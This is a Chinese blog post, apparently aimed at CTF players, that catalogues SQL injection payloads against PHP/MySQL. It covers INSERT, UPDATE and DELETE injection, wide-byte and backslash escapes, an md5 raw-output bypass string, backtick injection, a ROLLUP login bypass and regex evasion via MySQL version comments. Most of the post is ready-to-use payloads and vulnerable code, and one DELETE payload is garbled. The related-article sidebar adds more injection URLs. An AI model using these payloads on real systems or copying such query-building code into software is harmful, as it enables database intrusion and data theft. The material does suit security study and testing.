几种SQL注入(insert,update,delete,`, \ 等。。。)

最新推荐文章于 2024-05-17 18:04:04 发布
最新推荐文章于 2024-05-17 18:04:04 发布
阅读量7.9k 收藏 14
点赞数 4
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42133828/article/details/88765846
版权

insert注入

$sql = "insert into user(username,password) values('$username','$password',)";

payload: 适用于字符型:
         ' or updatexml(1,concat(0x7e,(database())),0) or '
     适用于数字型:
     ' or extractvalue(1,concat(0x5e24,(database()))) or '

$sql = "insert into user(username,password) values('' or updatexml(1,concat(0x7e,(database())),0) or '','$_POST['password']')";

 

update注入:

$sql = "update user set username='$username',password='$password' where id=$id";

payload:适用于字符型:
        ' or updatexml(1,concat(0x7e,(database())),0) or '
     适用于数字型:
    ' or extractvalue(1,concat(0x5e24,(database()))) or '

$sql = "update user set username='' or updatexml(1,concat(0x7e,(database())),0) or '',password='$_POST['password']' where id=$_POST['id']";


delete注入:

$sql = "delete from user where id=$id";

pauload:
       or or updatexml(1,concat(0x7e,(database())),0) or ' '
       or extractvalue(1,concat(0x5e24,(database()))) or ' '


其他类型的payload:
      
        'or(有效载荷)or'
 
    'and(有效载荷)and'
 
    'or(有效载荷)and'

    'or(有效载荷)and'='

    '*(有效载荷)*'

    'or(有效载荷)and'

    “ - (有效载荷) - “

宽字节注入:

由于转义了单引号成 \'  但是%df与\构成双字节,%df\结合为中文,从而%27逃逸
 
$sql = "select * from user where username='$username'";   

payload:

-1%df%27 union select 1,2,group_concat(column_name) from information_schema.columns

where table_name='table.name' #  (后面的''可以使用16进制编码,编码结束后在前面加上0x)


sql语句有 \:

$sql = "select * from users where username=\''.$usename.'\' and password=\''.$password.'\'";

$username,$password 被过滤:

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str); //删除字符串里的\
    }
 return htmlentities($str, ENT_QUOTES);
 //比如我们对字符串"<script>"使用htmlentities函数,字符串"<script>"将被转化为"&lt;script&gt;",
 //将"<"和“>”转换为HTML实体,可以防止浏览器将它们作为HTML元素的一部分被解释或运行(经常使用在用户提交表单数据的时候)。
 //htmlentities($str, ENT_COMPAT); // 只转换双引号
 //htmlentities($str, ENT_QUOTES); // 转换双引号和单引号
 //htmlentities($str, ENT_NOQUOTES); // 不转换任何引号
}

payload:
 
username=admin\&password=or 1 #

$sql = "select * from users where username=\''. admin\ .'\' and password=\''. or 1 # .'\'";

 

md5加密后的的SQL注入:

$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

思路比较明确,当md5后的hex转换成字符串后,如果包含'or'<trash>这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ''or'6<trash>'

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。
提供一个字符串:ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串:'or'6<trash>

 


sql注入之反引号注入

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";

反引号一般在Esc键的下方,和~在一起。它是为了区分MySQL的保留字与普通字符而引入的符号
    create table desc 报错
    create table `desc` 成功
    一般我们建表时都会将表名,库名都加上反引号来保证语句的执行度。
    table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1

 

sql注入之先查询用户,在比较密码


$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";  //查询uname
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {  //限制查询只有一条
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {    //传入的pwd要符合数据库里的pwd
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}

 

使用rollup技巧来绕过:
    在sql命令行里:
        select uname,pwd from test group by pwd with rollup;
        +--------------+-------+
        | uname        | pwd   |
        +--------------+-------+
        | 123          | 123   |
        | 123          | NULL  |
        +--------------+-------+
        rollup作用:在查询结果中多增加一行,而且他的的pwd的值为null。
        传参$_POST[pwd]的值为空时,$key['pwd'] == $_POST['pwd']满足
        
        
    在此之前我们还有一个条件要满足`mysql_num_rows($query) == 1`,我们要选择pass为NULL的单独的这一条记录。
    从源码分析可得,过滤了逗号,我们不能简单的使用`limit 1,1`这样的语法,而是可以使用`limit 1 offset 1`。就本地环境而言,比如
        select uname,pwd from test group by pwd with rollup limit 1 offset 2;
        +--------------+-------+
        | uname        | pwd   |
        +--------------+-------+
        | 123          | NULL  |
        +--------------+-------+
    
    $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
    
    payload: uname = ' or 1=1 group by pwd with rollup limit 1 offset 2 #
             pwd = 空
            
    $sql="SELECT * FROM interest WHERE uname = '{ ' or 1=1 group by pwd with rollup limit 1 offset 2 # }'";
    


正则绕过preg_match("/\b(select|insert|update|delete)\b/i",$message)之SQL注入

if(preg_match("/\b(select|insert|update|delete)\b/i",$message)){

        die("hello,sangebaimao!");

}

/*!*/只在mysql中有用,在别的数据库中这只是注释,但是在mysql,/*!select 1*/可以成功执行,在语句前可以加上5位数字,代表版本号,表示只有在大于该版本的mysql中不作为注释

$sql="insert guestbook(`message`) value('$message');";
 
payload:
   updatexml:
            ?message=aaa\x27 and updatexml(0,concat(0x27,(/*!00000select version()*/)),0)%23
   extractvalue:
               ?message=aaa\x27 and extractvalue(0,concat(0x27,(/*!00000select database()*/))) %23
   exp:
         ?message=aaa\x27 and (/*!00000select exp(~(/*!00000select*/ * from (/*!00000select*/ version())a)))%23

 

 

 

 

 

 

 

 

 

 

 

 

南人旧心1906
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
delete注入
Ethan024的博客
03-30 982
delete注入 实验环境: 皮卡丘平台—delete注入 原理: if(array_key_exists(‘id’, $_GET)){ KaTeX parse error: Expected '}', got 'EOF' at end of input: …ge where id = {$_GET[‘id’]}"; …} 要在’id’出构造闭合 实验步骤: 可以看到此时有一条留言: 删除该留言并且用Burpsuite抓包,并发送到repeater中: 设计payload:1 or updatexml
ORACLE SQL-UPDATEDELETEINSERT优化和使用技巧分享
09-10
在Oracle数据库管理中,SQL操作如UPDATEDELETEINSERT是常见的数据操纵语言(DML)命令,用于修改、删除和插入记录。以下是一些关于这些操作的优化和使用技巧: UPDATE语句优化: 1. **数据备份**:在执行任何...
SQL注入Update注入
weixin_43765321的博客
03-03 5430
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
4、delete注入
最新发布
weixin_51520483的博客
05-17 274
1、在某些传递不了参数,也有存在注入的,要通过抓包的进行注入1、inset、updatedelete等注入方式跟selec注入方式区别在于,这是一个操作,不是一个联合查 询,所以需要用报错方式或许信息2、当以抓取数据包形式插入payload时,要对插入的payload进行url编码3、在某些情况下,空格也可能被编码为%20。这是因为在某些URL编码标准中,符号也被视为特殊字符,因此为了避免混淆,有些系统或库可能会选择使用%20来编码空格。
不一样的sql注入
2202_75361164的博客
05-18 613
不一样的sql注入,看了肯定有所收获!
SQL注入测试平台 SQLol -5.DELETE注入测试
05-26 481
  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。 delete语法: DELETE FROM 【users】 WHERE 【username】 = 【'1'】    几个位置都可能存在注入,这里只演示一种。 下面演示注入到不同位置的方法。   一、String in WHERE clause 构造P...
SQL注入UPDATEinsertdelete注入
07-08 3226
SQL注入
Insert Update Delete_insertupdatedelete_sql_
09-29
inser update delete sql
SQL Server中的XML数据进行insertupdatedelete操作实现代码
09-11
SQL Server 2005/2008增加了对XML数据的支持,同时也新增了几种操作XML的方法,本文主要以SQL Server 2008为例介绍如何对XML数据进行insertupdatedelete
【SQL基础(三)】【SQL INSERT INTO 语句+SQL UPDATE 语句+SQL DELETE 语句】
12-14
文章目录SQL INSERT INTO 语句SQL UPDATE 语句SQL DELETE 语句 SQL INSERT INTO 语句 NSERT INTO 语句用于向表中插入新记录。 NSERT INTO 语句可以有两种编写形式。 第一种形式无需指定要插入数据的列名,只需提供被...
SQL Server中的XML数据进行insertupdatedelete
12-15
SQL Server中新增加了XML.Modify()方法,分别为xml.modify(insert),xml.modify(delete),xml.modify(replace)对应XML的插入,删除和修改操作。 本文以下面XML为例,对三种DML进行说明: declare @XMLVar xml = ‘ ...
.Net防sql注入几种方法
01-01
sql注入的常用方法: 1、服务端对前端传过来的参数值进行类型验证; 2、服务端执行sql,使用... private static string StrKeyWord = select|insert|delete|from|count(|drop table|update|truncate|asc(|mid(|char
数据库作业9:SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
INSERT INTO Student(Sno,Sname,Ssex,Sdept,Sage) VALUES('20121520','星河','男','IS',18); INTO中指出表名Student以及要增加的元组的属性。 【3.70】 INSERT INTO Student VALUES('20121521','张程敏','男'...
MSSQL2005 INSERT,UPDATE,DELETE 之OUTPUT子句使用实例
12-15
代码如下:–>Title:Generating test data –>Author:wufeng4552 –>Date :2009-10-07 15:16:26 if object_id(‘ta’)is not null drop table ta go create table ta(ID int identity,[name] varchar(10)) insert ta...
SQL server触发器中 update insert delete.png
08-06
SQL server触发器中 update insert delete
【3.23数据库作业9】SQL练习6 – INSERT / UPDATE / DELETE / NULL / VIEW
12-14
修改数据(UPDATE) 删除数据(DELETE) 3.6空值的处理 空值的产生 空值的判断 空值的约束条件 3.7视图 定义视图 查询视图 更新视图 视图的作用 ok 我们开始 3.5 数据更新 两种数据插入方式 插入元组 插入子查询结果...
SQL注入漏洞测试(delete注入)
qq_52718293的博客
12-09 2807
*首先关于报错型注入可以参考一下*文章了解 delecte注入的多种方法 这题我使用的是extractvalue函数 从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库 1.爆库 (pikaqiu) http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database()))) 2.爆表名(message) http://219.153.49.228:48577/
pikachu 漏洞平台sql注入delete注入
安全界的彭于晏的博客
06-26 942
delete 注入 一般在删除的界面 可能存在 我们看到靶场有一个留言板 点击删除抓个包试试 参数后面解payload 试一试 接着在后面爆表名字 or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or updatexml(1,concat(0x7e,subst
1-4.Delete与注入逻辑
山兔的博客
12-10 768
实战演示 我们首先打开kali的终端 输入mysql -uroot,当中在输入hxf数据库名,这样子就可以直接链接到hxf数据库。mysql -uroot hxf 我们可以通过show tables;看一下当前所具有的表名 我们看一下users,这是我们上一篇文章所留下来的,我们看一下它的内容。select * from users; 一共有7行 我们现在要拷贝一张表跟users表的内容是一样的,我们可以create table这个表名叫users2,as select * from users这样
SQL 语言基础,包括 SELECT、INSERTUPDATEDELETE 操作
05-14
SQL是结构化查询语言(Structured Query Language)的缩写,是一种被广泛使用的关系型数据库管理系统的标准语言。常见的操作包括SELECT(查询)、INSERT(插入)、UPDATE(更新)和DELETE(删除)。 1. SELECT操作:用于从一个或多个表中检索数据。语法如下: SELECT column1, column2, column3,....columnN FROM table_name; 示例: SELECT * FROM employees; // 检索全部数据 2. INSERT操作:用于向表中插入新数据。语法如下: INSERT INTO table_name (column1, column2, column3,....columnN) VALUES (value1, value2, value3,....valueN); 示例: INSERT INTO employees (first_name, last_name, email) VALUES ('John', 'Doe', 'john.doe@email.com'); 3. UPDATE操作:用于修改表中现有的数据。语法如下: UPDATE table_name SET column1 = value1, column2 = value2....columnN=valueN WHERE [condition]; 示例: UPDATE employees SET first_name = 'Jane', last_name = 'Doe' WHERE employee_id = 1; 4. DELETE操作:用于从表中删除数据。语法如下: DELETE FROM table_name WHERE [condition]; 示例: DELETE FROM employees WHERE employee_id = 1;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值